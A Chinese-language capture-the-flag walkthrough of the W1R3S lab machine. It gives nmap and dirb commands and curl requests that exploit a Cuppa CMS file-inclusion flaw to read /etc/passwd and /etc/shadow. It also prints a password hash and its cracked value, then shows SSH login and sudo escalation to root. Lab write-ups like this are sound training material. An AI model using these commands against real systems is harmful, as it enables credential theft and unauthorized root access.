【原創】項目五w1r3s.v1.0

實戰記錄

1、nmap資訊枚舉

1)C段掃描

nmap -sP 192.168.186.0/24

2)掃描全埠資訊

nmap -p- 192.168.186.143

image-20220602173511160

3)掃描版本資訊

nmap -p- 192.168.186.143 -sS -sV -A -T5

有用的資訊:

image-20220602174951726

image-20220602225229930

2、目錄爆破

dirb //192.168.186.143/

查找出該頁面存在administrator目錄:

//192.168.186.143/administrator/installation/

發現是Title[Cuppa CMS]框架!CuppaCMS是一套內容管理系統(CMS)!

image-20220602225432760

3、Google搜索:Cuppa CMS exploit
//www.exploit-db.com/exploits/25971

其實是個文件包含漏洞,請求中的urlConfig的參數會當做程式碼執行(原來這種也能申請CVE,驚呆。。。)

LINE 22: 
        <?php include($_REQUEST["urlConfig"]); ?>

嘗試通過get拼接,無回顯,因此改用post方式,因為漏洞是

$_REQUEST,兩種方式都是接收的。

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd //192.168.186.143/administrator/alerts/alertConfigField.php

發現存在正確回顯,說明驗證文件包含漏洞成功

image-20220602233235798

接下來就讀取shadow裡面的資訊,因為裡面有登陸的密碼

curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow //192.
168.186.143/administrator/alerts/alertConfigField.php

image-20220602233358304

在回顯中找最長的,因為裡面是包含有密碼,比如說這個

image-20220602233540949

w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

保存下

image-20220602233832778

使用john來暴力破解密碼,不加密碼本就是用的本地默認密碼本

image-20220602233851373

用戶名:w1r3s
密碼:computer

然後進行ssh登陸目標主機

 ssh [email protected]

然後繼續進行linux掃描,這裡用工具linpeas.sh,然後通過wget傳輸

控制端

image-20220602235124508

目標端

image-20220602235133422

執行掃描文件

image-20220602235256129

可利用的地方是橙色顯示,這裡發現可能可以通過sudo提權

image-20220602235607360

根據提示使用sudo -l,發現許可權都是可以使用的

image-20220602235807122

進一步使用sudo su去提權,發現成功了

image-20220602235921237

獲取flag成功

image-20220603000050908

擴展知識

1,定位問題函數

image-20220603000750568

2,控制/etc/sudoers的最低許可權

image-20220603000856712

image-20220603000938387

腦圖

image-20220603001519401

Tags:

VirMach 便宜 VPS

QNews

QNews